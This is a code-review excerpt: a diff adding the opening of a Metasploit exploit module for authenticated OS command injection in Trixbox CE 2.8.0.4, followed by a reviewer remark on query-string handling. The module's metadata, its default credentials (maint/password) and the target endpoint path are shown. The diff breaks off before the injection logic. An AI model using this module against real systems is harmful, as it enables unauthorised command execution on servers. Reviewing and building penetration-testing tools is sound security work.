modules/exploits/unix/webapp/trixbox_ce_auth_rce.rb

```diff
@@ -0,0 +1,89 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = GoodRanking
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Trixbox CE v2.8.0.4 (and prior versions) Authenticated Remote Command Execution',
+        'Description' => %q{
+          This module exploits a post-authentication OS command injection vulnerability found in Trixbox CE <= v2.8.0.4
+          which may allow arbitrary command execution on the underlying operating system.
+        },
+        'Author' => [
+          # Obrela Labs Team - Discovery and Metasploit module
+          'Anastasios Stasinopoulos (@ancst)'
+        ],
+        'License' => MSF_LICENSE,
+        'Platform' => ['unix'],
+        'Arch' => ARCH_CMD,
+        'DisclosureDate' => 'Apr 28 2020',
+        'Privileged' => false,
+        'Payload' =>
+          {
+            'Compat' =>
+              {
+                'PayloadType' => 'cmd',
+                'RequiredCmd' => 'perl'
+              }
+          },
+        'Targets' =>
+          [
+            [ 'Trixbox CE <= v2.8.0.4', {}]
+          ],
+        'DefaultTarget' => 0
+      )
+    )
+    register_options(
+      [
+        OptString.new('HttpUsername', [ true, 'User to login with', 'maint']),
+        OptString.new('HttpPassword', [ true, 'Password to login with', 'password']),
+      ]
+    )
+  end
+
+  def exploit
+    uri = '/maint/modules/endpointcfg/endpoint_devicemap.php?lang=english'
```

Comment:
Using `vars_get` (similar to `vars_post`) is preferred for the URL query string `lang=english`